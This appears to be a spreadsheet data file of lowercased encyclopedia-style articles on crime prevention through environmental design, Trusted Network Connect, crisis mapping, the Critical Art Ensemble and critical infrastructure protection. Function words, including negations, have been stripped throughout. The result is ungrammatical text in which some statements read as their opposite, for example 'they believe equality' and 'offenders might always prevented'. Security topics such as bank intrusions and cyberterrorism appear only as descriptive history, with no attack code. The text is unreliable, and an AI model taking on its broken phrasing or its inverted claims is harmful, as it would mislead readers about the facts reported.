reassurance ability inhibit crime citizen activities. target hardening strategies round techniques resolve crime final step. natural surveillance natural surveillance increases perceived risk attempting deviant actions improving visibility potential offenders general public. natural surveillance occurs designing placement physical features, activities people maximize visibility space users, fostering positive social interaction among legitimate users private public space. potential offenders feel increased scrutiny, thus inherently perceive increase risk. this perceived increase risk extends perceived lack viable covert escape routes. design streets increase pedestrian bicycle traffic place windows overlooking sidewalks parking lots. leave window shades open. passing vehicular traffic surveillance asset. create landscape designs provide surveillance, especially proximity designated points entry opportunistic points entry. shortest, least sight-limiting fence appropriate situation. transparent weather vestibules building entrances. when creating lighting design, avoid poorly placed lights create blind-spots potential observers miss critical areas. ensure potential problem areas well lit: pathways, stairs, entrances/exits, parking areas, atms, phone kiosks, mailboxes, stops, children's play areas, recreation areas, pools, laundry rooms, storage areas, dumpster recycling areas, etc. avoid too-bright security lighting creates blinding glare and/or deep shadows, hindering view potential observers. eyes adapt night lighting trouble adjusting severe lighting disparities. using lower intensity lights often requires fixtures. shielded cut-off luminaires control glare. place lighting along pathways pedestrian-use areas proper heights lighting faces people space (and identify faces potential attackers). utilizing curved streets multiple view points multiple houses' entrances, well making escape route difficult follow.natural surveillance measures complemented mechanical organizational measures. example, closed-circuit television (cctv) cameras added areas window surveillance unavailable. natural access control natural access control limits opportunity crime taking steps clearly differentiate public space private space. selectively placing entrances exits, fencing, lighting landscape limit access control flow, natural access control occurs. single, clearly identifiable, point entry structures divert persons reception areas incorporate maze entrances public restrooms. this avoids isolation produced anteroom double door entry system low, thorny bushes beneath ground level windows. rambling climbing thorny plants next fences discourage intrusion. eliminate design features provide access roofs upper levels front yard, waist-level, picket-type fencing along residential property lines control access, encourage surveillance. locking gate front backyards. shoulder-level, open-type fencing along lateral residential property lines side yards extending back yards. they sufficiently unencumbered landscaping promote social interaction neighbors. substantial, high, closed fencing (for example, masonry) backyard public alley instead wall blocks view angles.natural access control used complement mechanical operational access control measures, target hardening. natural territorial reinforcement territorial reinforcement promotes social control increased definition space improved proprietary concern. environment designed clearly delineate private space things. first, creates sense ownership. owners vested interest likely challenge intruders report police. second, sense owned space creates environment "strangers" "intruders" stand easily identified. using buildings, fences, pavement, signs, lighting landscape express ownership define public, semi-public private space, natural territorial reinforcement occurs. additionally, objectives achieved assignment space designated users previously unassigned locations. maintained premises landscaping communicates alert active presence occupying space. provide trees residential areas. research results indicate that, contrary traditional views within enforcement community, outdoor residential spaces trees seen significantly attractive, safe, likely used similar spaces without trees. restrict private activities defined private areas. display security system signage access points. avoid chain link fencing razor-wire fence topping, communicates absence physical presence reduced risk detected. placing amenities seating refreshments common areas commercial institutional setting helps attract larger numbers desired users. scheduling activities common areas increases proper use, attracts people increases perception areas controlled. motion sensor lights entry points residence.territorial reinforcement measures make normal user feel safe make potential offender aware substantial risk apprehension scrutiny. when people take pride proper measures protect belongings, crime deterred areas makes challenge. other cpted elements maintenance activity support aspects cpted touched upon preceding, often treated separately physical design elements within built environment. maintenance maintenance expression ownership property. deterioration indicates less control intended users site indicate greater tolerance disorder. broken windows theory valuable tool understanding importance maintenance deterring crime. broken windows theory proponents support zero tolerance approach property maintenance, observing presence broken window entice vandals break windows vicinity. sooner broken windows fixed, less likely vandalism occur future. vandalism falls broken windows category well. faster graffiti painted over, less likely repeat done. having positive image community shows sense pride self-worth take away owner property. activity support activity support increases built environment safe activities intent increasing risk detection criminal undesirable activities. natural surveillance intended users casual specific plan people watch criminal activity. placing signs caution children playing signs certain activities area, citizens area involved happening around them. they tuned supposed looks suspicious. effectiveness criticism cpted strategies successful inconvenience user least cpted design process relies upon combined efforts environmental designers, land managers, community activists, enforcement professionals. strategies listed can't fulfilled without community's help requires whole community location make environment safer place live. meta-analysis multiple-component cpted initiatives united states found decreased robberies (casteel peek-asa, 2000).in terms effectiveness, accurate title strategy would crime deterrence environmental design. research demonstrates offenders might always prevented committing crimes using cpted. cpted relies upon changes physical environment cause offender make certain behavioral decisions, decisions include desisting crime. those changes deter rather conclusively "prevent" behavior. beyond attraction cost effective lowering incidence crime, cpted typically reduces overall costs preventing crime. retrofitting existing environment meet cpted sometimes costly, incorporated original design phase facility planning, cost designing cpted principles often lower traditional approaches. operational costs often lower also, cpted lighting designs significantly lower energy use. adding attraction cpted lowers liability. times entire street style must changed buildings code windows changing view access points areas around building like parking store front. also disciplinary architecture environmental psychology hostile architecture copenhagenization urban vitality notes references external links international cpted association european designing crime association stichting veilig ontwerp beheer (the netherlands) crime prevention built environment. washington state university cpted annotated bibliography. last accessed 2006. https://www.crcpress.com/21st-century-security-and-cpted-designing-for-critical-infrastructure-protection/atlas/p/book/9781439880210</t>
  </si>
  <si>
    <t>Trusted Network Connect</t>
  </si>
  <si>
    <t>trusted network connect (tnc) open architecture network access control, promulgated trusted network connect work group (tnc-wg) trusted computing group (tcg). history architecture first introduced conference 2005. originally network access control standard goal multi-vendor endpoint policy enforcement.in 2009 announced expanded specifications extended specifications systems outside enterprise network. additional uses reported include industrial control system (ics), scada security, physical security. specifications specifications introduced work group: architecture interoperability if-imc integrity measurement collector interface if-imv integrity measurement verifier interface if-tnccs trusted network connect client-server interface if-m vendor-specific imc/imv messages interface if-t network authorization transport interface if-pep policy enforcement point interface if-map metadata access point interface cesp clientless endpoint support profile federated vendor adoption partial list vendors adopted standards: also, networking cisco symantec trapeze networks tofino customer adoption u.s. army planned technology enhance security computer networks.the south carolina department probation, parole, pardon services tested tnc-scap integration combination pilot program. also if-map trusted computing trusted computing group trusted internet connection references sources dornan, andy. “'trusted network connect' puts hardware security agent every pc”, “information week magazine”, techweb publishing. vijayan, jaikumar. “vendor group adds access specs”, “computer world magazine”, publishing. higgins, kelly jackson. “trusted computing group widens security specs beyond enterprise networks”, “dark reading”, techweb publishing. townsend, mark. “naked endpoints net, them”, magazine”, haymarket media. fang, juan zeng, hongli. “the model trusted network connect based credibility hierarchy”, nswctc, vol. 454–457, 2010 second international conference networks security, wireless communications trusted computing, 2010. howard, scott (2010-06)(“securing scada control networks”, “urunkoruma.com”. external links trusted network connect specifications</t>
  </si>
  <si>
    <t>Crisis mapping</t>
  </si>
  <si>
    <t>crisis mapping (also known disaster mapping) real-time gathering, display analysis data crisis, usually natural disaster social/political conflict (violence, elections, etc.). crisis mapping projects usually allows large numbers people, including public crisis responders, contribute information either remotely site crisis. benefit crisis mapping method others increase situational awareness, since public report information improve data management.crisis mappers work data comes diverse sources produced varying purposes. such, overlap data, international development, community engagement. history first major events utilize crisis mapping 2010 haiti earthquake, killed injured hundreds thousands people left homes infrastructure badly damaged. people wanted help started mapping basic infrastructure, especially openstreetmap, able detailed mapping better resources became available. crisis mapping form another used many crises since then. many volunteers also joined help data responses crises build information-handling tools crisis mappers crisis responders field. since 2010, crisis mappers mapped events libya (refugees), japan (crowdsourcing radiation monitoring 2011 tōhoku earthquake tsunami), chile (humanitarian response 2010 chile earthquake), pakistan (2010 pakistan floods, 2011 floods), somalia (refugees), alabama (2011 super outbreak), dozens smaller disasters events around world. zaatari refugee camp jordan, hosting syrians escaping war, actively mapped openstreetmap unhcr reach workers. techniques crisis mapping leverage following tools methods power effective early warning rapid response complex humanitarian emergencies: mobile web-based applications, participatory maps crowdsourced event data, aerial satellite imagery, geospatial platforms, advanced visualization, live simulation, computational statistical modelscrisis mappers usually volunteers, meaning contribute non-wage labor. they professional mappers, software developers, data analysts, members public. since field, crisis mapping engages users' existing skills, rather field-specific skills. however, skills often acquired "deployments", crisis mapping organization interface established begin collecting data.instances crisis mapping usually goal process and/or produce data would value crisis. examples processing data include geolocating news reports, classifying translating text messages. common scrape social media sites crisis-specific keywords. instance, crisis mapping include gathering tweets specific designated hashtag. examples producing data creating geographic data "tracing" buildings roads aerial imagery, identifying refugee camps aerial imagery.these activities usually crowdsourced degree another coordinated online applications. dedicated software often used, example based ushahidi sahana. "mechanical-turk" techniques sometimes used break tasks tiny chunks completed quickly. often social technologies also frequently used, like skype google drive. crisis mapping organizations crisis mappers online teams people, usually volunteers, gather provide data online people responding people affected disasters. gather organize data, groups formed organize volunteers teams execute certain tasks. organizations active crisis mapping include: humanitarian openstreetmap team humanity road sahana crisis cleanup european-mediterranean seismological centre also crowdmapping references notes "need know" program "crisis mapping", 13th 2011 ziemke overview crisis mapping</t>
  </si>
  <si>
    <t>Critical Art Ensemble</t>
  </si>
  <si>
    <t>critical ensemble (cae) collective five tactical media practitioners various specializations including computer graphics design, film/video, photography, text art, book art, performance. cae, tactical media situational, ephemeral, self-terminating. encourages media engage particular socio-political context order create molecular interventions semiotic shocks collectively could diminish rising intensity authoritarian culture.since formation 1987 tallahassee, florida, frequently invited exhibit perform projects examining issues surrounding information, communications bio-technologies museums cultural institutions. these include whitney museum museum nyc; corcoran museum washington d.c.; ica, london; mca, chicago; schirn kunsthalle, frankfurt; musée d'art moderne ville paris; london museum natural history; kunsthalle luzern, documenta collective written books, writings translated languages. work covered journals, including artforum, kunstforum, drama review. critical ensemble recipient awards, including 2007 andy warhol foundation wynn kramarsky freedom artistic expression grant, 2004 john lansdown award multimedia, 2004 leonardo horizons award innovation. history 1986–1990 formed 1987, cae's focus exploration intersections art, critical theory, technology, political activism. 1986, steve kurtz steve barnes began collaboration make low-tech videos students. they credited person contributed productions signature critical ensemble. during summer 1987, group transformed broad-based artist activist collective core members: steve kurtz, steve barnes, dorian burr, beverly schlee, ricardo dominguez (professor) hope kurtz. 1987, group's first multimedia exhibitions held club miami pappy's lounge jackson, mississippi. 1988, group's first events produced: political florida? collaboration group material, frontier production collaboration thomas lawson. 1988-89, begin release books plagiarist text poetry all). 1989, group collaborated gran fury release cultural vaccines, multimedia event tallahassee, florida, critiques u.s. policy hiv. 1990, group collaborated prostitutes york create peep show premiered window gaines tallahassee, florida. 1991–1995 1991, body work titled fiesta critica developed indiantown, florida, local migrant workers; addressing floridian agricultural labour relations. produces easter fiesta platform show works. 1992, group produces exit culture series works developed highway culture. they also propose electronic disturbance autonomedia publishers. 1993, group invited perform first appearance europe audio/visual experimental festival netherlands. they complete associational documentary series apocalypse utopia. 1994, autonomedia publishes electronic disturbance construction begins create cae's website critical ensemble. projects begin appear real virtual forms useless technology project performed street action launched online. concept electronic civil disobedience introduced terminal futures conference london. 1995, concept data body introduced lectures electronica. group tours around europe performance body count. 1996–2000 1996, autonomedia publishes electronic civil disobedience (the companion text electronic disturbance), research begins book flesh machine. 1997, group tours flesh frontiers shareholder's briefing. castelvecchi publishes italian translation electronic disturbance. group goes documenta kassel, germany begin editing conceptualizing process book readme: ascii culture revenge knowledge hybrid workspace. performance flesh machine toured, premiering vienna closing helsinki kiasma museum contemporary summer 1998. l'eclat publishes french anthology cae's writings titled resistance electronique. 1998, autonomedia publishes flesh machine german translation published passagen. group's street action occurs sheffield, performance international campaign free alcohol tobacco unemployed. castelvecchi publishes italian translation electronic civil disobedience. 1999, society reproductive anachronisms premiered rutgers university student cafeteria. work begins cult (cone) premiered clara hospital rotterdam, netherlands. book project begun, entitled digital resistance: explorations tactical media. 2000, autonomedia publishes digital resistance: explorations tactical media german anthology cae's writings electronic media published passagen.the group exhibited performed diverse venues internationally, ranging street, museum, internet. museum exhibitions include whitney museum museum nyc; corcoran museum washington d.c.; ica, london; mca, chicago; schirn kunsthalle, frankfurt; musée d'art moderne ville paris; london museum natural history. critical ensemble 2003–2004 free range grain performance-based project tested foods contest global food trade system. project used basic molecular biology techniques 72-hour period test foods others deemed suspicious "contamination" even authorities guarding them. this performance sought explore biotechnology science behind artists felt "one misunderstood areas production cultural landscape". works artistic approach performance style performances, creates various performative identities, group scientists corporation. instead using fancy, high-tech machinery 'high school equipment well common household supplies groceries', brings scientific difficulty level public understand engage worlds science technology modern world 'increasingly privatised'. this playful style, however, contrasts groups numerous books manifestos analytical focus.nicola triscott founder arts catalyst. writings cae, states participatory theatre 'aims involve public processes biotechnology order contribute development informed critical public discourse contemporary bioscience'. this provides people knowledge science interesting misused wrong hands. their works ranged genetically modified food, human genome project (cone), reproductive technologies, genetic screening transgenics. approach style directly engaging science presenting techniques generally unknown public performative way. work continues entertain, inform show public biotechnology demonstrated performance.as part critical objectives, target attention private corporations unknown public sector misuse biotechnology. this tactical response termed 'fuzzy biological sabotage' abbreviated).using harmless biological species including plants, insects reptiles, make sophisticated pranks operate grey, in-between spaces unregulated institutional regimes' publications collective written books, writings translated languages. books include: electronic disturbance (1994), electronic civil disobedience other unpopular ideas (1996), flesh machine: cyborgs, designer babies, eugenic consciousness (1998), digital resistance: explorations tactical media (2001), molecular invasion (2002), marching plague (2006), project book disturbances (2012). noted written article nomadic power cultural resistance, argues creation internet power elite become mobile extent difficult dissident directly confront authority, comparing untrackable, elusive mobility scythians. they demolished idea power cannot corrupt co-opt network hypertext technologies, technologies predetermined manifest destiny freedom. goes observe occupation theory challenged cyberspace difficulties presents terms focusing group effort authority opposed singular hacker, fiddling code. important distinction made rebellious acts carried individual opposed group singularity, dissenter seen vandal instead protester. article mentions resistance form posters, pamphleteering, street theater public useful past public electronically engaged must bring resistance methods online. molecular invasion correlation cae's work "molecular invasion (2002)," collective hosted exhibit genetically modified crops. they planted monsanto's genetically modified seeds designed immune monsanto's commercial pesticide roundup (glyphosate). they successfully grew crops exhibit however plants fully grown applied enzyme inhibitor reverse engineered plants eradicating protection crops pesticide. plants quickly died. though showing visualized traces criticalized artworks shows paradox modern agriculture systems, cae's tried make stance general position whether genetically modified organisms(gmos). cult 1999, began project draw attention ways scientific discourses surrounding biotechnologies drew upon promissory religious rhetoric. this participatory performance titled cult cone abbreviated) included "communion" using random library entire genome first female donor human genome project taken blood sample. spliced genome inserted yeast, placed host wafers beer given audience members willing participate. genome donor intended represent 'new eve… sacrosant messiah'. project also offers public online preaching, baptisms, communion, sacred theological cosmological texts prophecies. genterra created performance titled genterra raised issues surrounding ethics safety performative science. this done investigation creating transgenic life forms seeing consequences potentially releasing environment. audience members decide whether bacteria harmful game 'genetic russian roulette'. triscott states experience participating performance members audience given opportunity grow store bacteria, full instructions guidance. with spinning machine, bacteria spun chambers holding active bacteria. purpose genterrra 'introduce bioproducts audience, demonstrate practical applications research, disease treatment xenotransplantation'. wear lab-coats appear professional scientists, simulate actual biotechnology corporations, emphasizing intentions even further. collective structure attributes collective's longevity structure contributed positive attitudes throughout group. number members, ranging three eight known 'cellular structure' managed sustained without members feeling alienated. member opportunity show individual strengths weaknesses, risk conflict mistrust reduced. they believe equality; rather every member voice production process project]; however member greatest expertise area authority final product'. amateurism also stated amateurs ability dominant paradigms, free recombine elements paradigms thought long dead, apply everyday life experience deliberations. most important, however, amateurs invested institutional systems knowledge production policy construction, hence irresistible forces guiding outcome process…'. future projects 'since 2006, changed focus work towards critique defense policy, moved away interrogation biotechnology'. controversy steve kurtz's trial 2004, founders, steve kurtz, arrested suspicion bioterrorism. morning 2004, woke find wife hope died sleep. called 911. police became suspicious noticing biology kept home. they contacted kurtz detained hours interrogated house searched biohazardous materials. house given clear, week later, kurtz's collaborators ordered appear grand jury investigate possible violations regarding biological weapons. jury july 2004 cleared kurtz "bioterrorism" charges, however continued press charges artist case dragged four years. case widely covered international press, sparked outrage among artists scientists worldwide. website created people donate money help kurtz mounting legal fees. case dismissed 2008. according nicola triscott, 'thought situation could manufacture terrorism case, potentially brought great personal rewards', based upon 'lackawanna sleeper cell' case yemeni americans convicted supporting al-qaeda awards critical ensemble recipient awards, including 2007 andy warhol foundation wynn kramarsky freedom artistic expression grant professor "strange culture" case goes court wbfo, 2004 john lansdown award multimedia [1], 2004 leonardo horizons award innovation. rhizome [leonardo/isast network] leonardo/isast gives horizons award innovation critical ensemble (leonardo/isast) cae's work covered journals, including artforum, kunstforum, drama review. calendar humanities project university rochester also autonomedia bioart biopunk electronic disturbance theatre institute applied autonomy steve kurtz tactical media internet activism wayne roberts notes references critical ensemble, 2000 winter, 'timeline', drama review 1988-, vol. 132–135 press. sholette, 2005 summer, 'disciplining avant-garde: united states versus critical ensemble', circa, 112, 50–59 circa magazine. triscott, (2009) interfaces performance, surrey, ashgate publishing limited, chatzichristodoulou, jefferies, zerihan, (eds.), 'performative science specialization: case critical ensemble', 151–166. critical ensemble, 'fuzzy biological sabotage', molecular invasion, 2009, accessed 2010-02-17. critical ensemble, (2001) digital resistance: explorations tactical media, york, autonomedia, 70-73. critical ensemble, 2000 winter, 'performing cult', drama review 1988-, vol. 167–173 press. wardrip-fruin, noah, nick montfort. "nomadic power cultural resistance." media reader. cambridge, mass.: mit, 2003. print. further reading critical ensemble, (1994), electronic disturbance, york, autonomedia/semiotext. critical ensemble, (1996), electronic civil disobedience other unpopular ideas, york, autonomedia. critical ensemble, (1998), flesh machine: cyborgs, designer babies, eugenic consciousness, york, autonomedia. critical ensemble, (2001), digital resistance: explorations tactical media, york, autonomedia critical ensemble, (2002), molecular invasion, york, autonomedia. critical ensemble, (2006), marching plague: germ warfare global public health, york, autonomedia. critical ensemble, (2012), disturbances, london, four corners. perini, julie (2010). "art intervention: guide today's radical practices". team colors collective (ed.). uses whirlwind: movement, movements, contemporary radical currents united states. press. isbn 9781849350167. external links official site gregory sholette disciplining avant-garde, united states versus critical ensemble interview critical ensemble port interview steve kurtz critical ensemble plazm magazine nomadic power cultural resistance presentation steve kurtz cyprus university technology</t>
  </si>
  <si>
    <t>Critical infrastructure protection</t>
  </si>
  <si>
    <t xml:space="preserve">critical infrastructure protection (cip) concept relates preparedness response serious incidents involve critical infrastructure region nation. american presidential directive pdd-63 1998 national program "critical infrastructure protection". 2014 nist cybersecurity framework published presidential directives. europe, equivalent european programme critical infrastructure protection (epcip) refers doctrine specific programs created result european commission's directive com(2006) designates european critical infrastructure that, case fault, incident, attack, could impact country hosted least european member state. member states obliged adopt 2006 directive national statutes. history u.s. u.s. national program ensure security vulnerable interconnected infrastructures united states. 1998, president bill clinton issued presidential directive pdd-63 subject critical infrastructure protection. this recognized certain parts national infrastructure critical national economic security united states well-being citizenry, required steps taken protect this updated december 2003, president bush homeland security presidential directive hspd-7 critical infrastructure identification, prioritization, protection. directive describes united states critical infrastructure vital united states incapacity destruction systems assets would debilitating impact security, national economic security, national public health safety." overview systems networks make infrastructure society often taken granted, disruption systems dire consequences across sectors. take, example, computer virus disrupts distribution natural across region. this could lead consequential reduction electrical power generation, turn leads forced shutdown computerized controls communications. road traffic, traffic, rail transportation might become affected. emergency services might also hampered. entire region become debilitated critical elements infrastructure become disabled natural disaster. while potentially contravention geneva conventions, military forces also recognized cripple enemy's ability resist attacking elements civilian military infrastructure. federal government developed standardized description critical infrastructure, order facilitate monitoring preparation disabling events. government requires private industry critical economic sector assess vulnerabilities physical cyber attacks plan eliminate significant vulnerabilities develop systems identify prevent attempted attacks alert, contain rebuff attacks then, federal emergency management agency (fema), rebuild essential capabilities aftermath infrastructure sectors defines sectors organizational responsibilities standard way: banking finance: department treasury responsible coordinating protection systems also maintaining public confidence, industry initiatives financial services information sharing analysis center (isac) transportation: department transportation responsible protecting road, rail, air, water transportation infrastructure, including computer-controlled just-in-time delivery systems, optimization distribution hubs, traffic operations centers consolidated locations, regulation transport hazardous materials. power: department energy oversees energy supplies including electricity, oil, gas, works nuclear regulatory commission protection nuclear materials power. note sector different energy security, politics economics supply. additionally, operating auspices federal energy regulatory commission north american electric reliability corporation (nerc), non-profit organization defines enforces reliability standards bulk power system. information communications: overseen department commerce, areas life rely telecommunications information technology. federal municipal services: overseen jointly federal state agencies. they guarantee continuity government federal, state, local levels meet provision essential services. emergency services: overseen health human services, includes emergency health services public health fire departments: overseen federal emergency management agency fema. enforcement agencies: overseen jointly department justice federal bureau investigation ensure orderly running activities times threat crises. public works: overseen united states environmental protection agency. this includes safe water systems drainage.in 2003 remit expanded include: agriculture food, department agriculture overseeing safe supply meat, poultry, products. national monuments icons, department interiorwith much critical infrastructure privately owned, department defense (dod) depends commercial infrastructure support normal operations. department state central intelligence agency also involved intelligence analysis friendly countries. 2007 completed sector-specific plans (ssp) coordinating dealing critical events. continuity government (cog) time catastrophic event used preserve government seen president, point welfare government placed welfare citizenry united states ensuring government preserved rebuild economy country deemed safe return surface united states america. significance march 1999, deputy defense secretary john hamre warned united states congress cyber terrorist "electronic pearl harbor" saying, going navy ships sitting navy shipyard. going commercial infrastructure". later fear qualified president clinton reports actual cyber terrorist attacks 2000: think alarm. think pearl harbor. lost pacific fleet pearl harbor. think analogous loss great." there many examples computer systems hacked victims extortion. example occurred september 1995 russian national allegedly masterminded break-in citicorp's electronic funds transfer system ordered stand trial united states. gang hackers leadership breached citicorp's security times 1994. they able transfer million customer accounts withdraw estimated $400,000. past, systems networks infrastructure elements physically logically independent separate. they little interaction connection sectors infrastructure. with advances technology, systems within sector became automated, interlinked computers communications facilities. result, flow electricity, oil, gas, telecommunications throughout country linked—albeit sometimes indirectly—but resulting linkages blur traditional security borders. while increased reliance interlinked capabilities helps make economy nation efficient perhaps stronger, also makes country vulnerable disruption attack. this interdependent interrelated infrastructure vulnerable physical cyber disruptions become complex system single points failure. past incident would isolated failure cause widespread disruption cascading effects. example, capabilities within information communication sector enabled united states reshape government business processes, becoming increasingly software driven. catastrophic failure sector potential bring multiple systems including traffic control, emergency services, banking, trains, electrical power, control. elements infrastructure also considered possible targets terrorism. traditionally, critical infrastructure elements lucrative targets anyone wanting attack another country. now, infrastructure become national lifeline, terrorists achieve high economic political value attacking elements disrupting even disabling infrastructure reduce ability defend nation, erode public confidence critical services, reduce economic strength. additionally, well chosen terrorist attacks become easier less costly traditional warfare interdependence infrastructure elements. these infrastructure elements become easier targets probability detection. elements infrastructure also increasingly vulnerable dangerous traditional nontraditional types threats. traditional non-traditional threats include equipment failures, human error, weather natural causes, physical attacks, cyber attacks. threats, cascading effect caused single points failure potential pose dire far-reaching consequences. challenges there fears frequency severity critical infrastructure incidents increase future.although efforts way, unified national capability protect interrelated aspects country's infrastructure. reason good understanding inter-relationships exist. there also consensus elements infrastructure mesh together, element functions affects others. securing national infrastructure depends understanding relationships among elements. thus sector scheduled three-week drill mimic effects pandemic flu, even though two-thirds participants claimed business continuity plans place, barely half reported plan moderately effective.critical infrastructure protection requires development national capability identify monitor critical elements determine elements attack victim destructive natural occurrences. important link risk management infrastructure assurance. provides capability needed eliminate potential vulnerabilities critical infrastructure. practitioners determine vulnerabilities analyze alternatives order prepare incidents. they focus improving capability detect warn impending attacks system failures within, critical elements national infrastructure. organization structure pdd-63 mandated formation national structure critical infrastructure protection. accomplish primary actions produce national infrastructure assurance plan, niap, later renamed national infrastructure protection plan nipp. different entities national structure work together partnership government public sectors. each department agency federal government responsible protecting portion government's critical infrastructure. addition, grants made available department homeland security municipal private entities security purposes. these include grants emergency management, water security training, rail, transit port security, metropolitan medical response, terrorism prevention programs urban areas security initiative.pdd-63 identified certain functions related critical infrastructure protection must performed chiefly federal government. these national defense, foreign affairs, intelligence, enforcement. each lead agency special functions appoints senior official serve functional coordinator federal government. 2008 mobile pda-based vulnerability assessment security survey tool (vasst) introduced speed physical security assessment critical infrastructure enforcement meet compliance requirements pdd-63. national infrastructure assurance plan national infrastructure protection plan identified major sectors critical infrastructure, federal government appointed sector liaison official designated lead agency. private sector counterpart, sector coordinator, also identified. together, sector representatives, federal government corporate, responsible developing sector niap. addition, department agency federal government responsible developing plan protecting portion federal government's critical infrastructure. federal department agency plans assimilated sector niaps create comprehensive national infrastructure assurance plan. additionally national structure must ensure national program. this program includes responsibilities education awareness, threat assessment investigation, research. process includes assessments protection defined state defended, safeguarded, shielded injury, loss, destruction natural unnatural forces. vulnerability quality susceptible attack injury, warranted unwarranted, accident design. risk possibility likelihood attacked injured. mitigation ability alleviate, reduce, moderate vulnerability, thus reducing eliminating risk. controversy there public criticisms mechanisms implementation security initiatives grants, claims companies benefit, encouraging unnecessary culture fear. commentators note initiatives started directly collapse cold war, raising concern simply diversion military-industrial complex away funding area shrinking richer previously civilian arena. grants distributed across different states even though perceived risk evenly spread, leading accusations pork barrel politics directs money jobs towards marginal voting areas. urban areas security initiative grant program particularly controversial, 2006 infrastructure list covering 77,000 assets, including popcorn factory stand. 2007 criteria reduced 2,100 facilities must make much stronger case become eligible grants. while well-intentioned, results also questioned regarding claims poorly designed intrusive security theater distracts attention money pressing issues creates damaging side effects. absence comparative risk analysis benefits tracking made difficult counter allegations authority. order better understand this, ultimately direct effort productively, risk management analysis office recently created national protection programs directorate department homeland security. department defense u.s. department defense responsible protecting portion government's critical infrastructure. part program, responsibilities traverse national department-wide critical infrastructure. pdd-63 identified responsibilities critical infrastructure protection. first, identify critical assets infrastructures provide assurance analysis, assessment, remediation. also responsible identifying monitoring national international infrastructure requirements industry government agencies, needed included protection planning. also addressed assurance protection commercial assets infrastructure services acquisitions. other responsibilities included assessing potential impact military operations would result loss compromise infrastructure service. there also requirements monitoring operations, detecting responding infrastructure incidents, providing department indications warnings part national process. ultimately, responsible supporting national critical infrastructure protection. response requirements identified pdd-63, categorized critical assets sector, manner similar national organization. identified slightly different list infrastructure sectors areas specifically required protection dod. dod's organizational structure critical infrastructure protection reflects, complements, effectively interacts national structure cip. sectors there defense critical infrastructure sectors protected dod. these include: financial services defense financial services support activities related officially appropriated funds. these activities include disbursement cash, receipt funds, acceptance deposits credit officially designated treasury general accounts. this sector also provides financial services individuals on-base organizations, including deposits, account maintenance, safekeeping. defense finance accounting service lead component financial services sector. transportation defense transportation system, dts, includes resources support global transportation needs. these include surface, sea, lift assets; supporting infrastructure; personnel; related systems. transportation command, ustranscom, single manager transportation. public works public works includes four distinct physical infrastructure sectors: electric power, oil, natural gas, water sewer; emergency services, fire, medical, hazardous material handling. this defense infrastructure sector composed networks systems, principally distribution associated commodities. corps engineers responsible coordinating assurance activities public works infrastructure sector. global information grid command control, gig/c2 global information grid command control, gig/c2, combined sectors support overall asset assurance cip. globally interconnected personnel, information, communication capabilities necessary achieve information superiority. includes assets, facilities, networks, systems support mission accomplishment. defense information systems agency, disa, lead component responsible global information grid command control. intelligence surveillance, reconnaissance, defense intelligence, surveillance reconnaissance infrastructure sector composed facilities, networks, systems support activities intelligence production fusion centers. defense intelligence agency, dia, responsible coordinating assurance activities infrastructure sector. health affairs health care infrastructure consists facilities sites worldwide. some located installations; however, also manages larger system non-dod care facilities within health care network. these health care facilities linked information systems. office assistant secretary defense, health affairs designated lead component sector. personnel defense personnel infrastructure sector includes large number assets hosted component sites, network facilities, information systems linking sites facilities. addition responsible assets, personnel infrastructure sector also coordinates commercial services support personnel function. these services include recruitment, record keeping, training. defense human resources activity designated lead component defense personnel infrastructure sector. space defense space infrastructure sector composed space- ground-based assets including launch, specialized logistics, control systems. facilities located worldwide dod-controlled private sites. defense space sector united states strategic command, usstratcom. logistics defense logistics sector includes activities, facilities, networks, systems support provision supplies services u.s. forces worldwide. logistics includes acquisition, storage, movement, distribution, maintenance material supplies. this sector also includes final disposition material longer needed dod. defense logistics agency, dla, lead component logistics infrastructure. defense industrial base defense industrial base consists product service providers private sector. services products provided constitute critical assets dod. lead component defense industrial base defense contract management agency. cases infrastructure protection requirements affect defense sector, special function components support implementation cip. special functions special function components interface equivalent national functional coordinators coordinate activities related function within dod. dod's special function components currently include seven areas focus. they include following components: policy strategy policy strategy special function component provides strategic planning required prepare armed forces 21st century. part, satisfies responsibility development national military strategy. within area policy development responsible leading chairman's biennial review unified command plan developing joint staff positions issues organization, roles missions, functions armed forces combatant commands. intelligence support intelligence support special function component provides intelligence support protection defense portion federal government critical infrastructure. intelligence support responsibilities also include supporting defense warning system, alert notification, interfacing national intelligence community. responsibilities intelligence support agencies include activities provisioning threat assessments; indications warnings potential attacks; advice support sector ciaos development defense infrastructure sector monitoring reporting; crisis management support; counter-intelligence. this special function component also tasked support contingent nipc related intelligence counter-intelligence. industrial policy under secretary defense acquisition, technology logistics ensures adequate defense industrial base exists remains viable meet current, future, emergent national security requirements." defense security defense security service provides department defense federal agencies array security products services designed deter detect espionage information assurance assistant secretary defense networks information integration, nii, principal staff assistant development, oversight, integration policies programs relating strategy information superiority department defense. information assurance, component information operations assures dod's operational readiness providing continuous availability reliability information systems networks. protects exploitation, degradation, denial service, providing means efficiently reconstitute reestablish vital capabilities following attack. research development research development special function component responsible information assurance protection. office director, defense research engineering coordinates research development agenda. well reconciling agenda national agenda. education awareness although education awareness rightly considered everyone's responsibility, comprehensive education awareness strategy deemed essential successful program. national defense university, ndu, provided advice assistance assessing education awareness requirements. education awareness component also developed ciao education program. this component tasked assist development special education training required crisis management personnel. education awareness also supports national policy strategy formulation executive leadership development periodic "infrastructure games". lifecycle mandated pdd-63, must protect portion federal government's critical infrastructure. dod, defense infrastructure protecting defense infrastructure complex task involving defense sectors. deemed nearly impossible protect every critical asset every location, therefore focus directed protecting critical defense infrastructure. critical defense infrastructure critical assets essential providing mission assurance. phases phases life cycle build another create framework comprehensive solution infrastructure assurance. life cycle phases occur before, during, event compromise degrade infrastructure. synopsis phases are: analysis assessment (occurs event) analysis assessment phase foundation important phase life cycle. this phase identifies assets absolutely critical mission success determines assets’ vulnerabilities, well interdependencies, configurations, characteristics. assessment made operational impact infrastructure loss degradation. addition, proactive cyber defence anticipate attack computers networks. applies equally well critical infrastructure sectors, involves interdicting disrupting attack threat's preparation attack, either preemptively self-defense. remediation (occurs event) remediation phase involves precautionary measures actions taken event occurs known cyber physical vulnerabilities could cause outage compromise national defense infrastructure, ndi, critical asset. example, remediation actions include education awareness, operational process procedural changes system configuration component changes. indications warnings (occurs and/or event) indications warnings phase involves daily sector monitoring assess mission assurance capabilities critical infrastructure assets determine event indications report. indications preparatory actions indicate whether infrastructure event likely occur planned. indications based input tactical, operational, theater, strategic level. tactical level, input comes asset owners. operational level, input comes sectors. theater level, input comes regional assets allied intelligence, nato, command intelligence, allied governments, coalition forces. strategic level, input comes intelligence, law-enforcement, private sector. warning process notifying asset owners possible threat hazard. mitigation (occurs event) 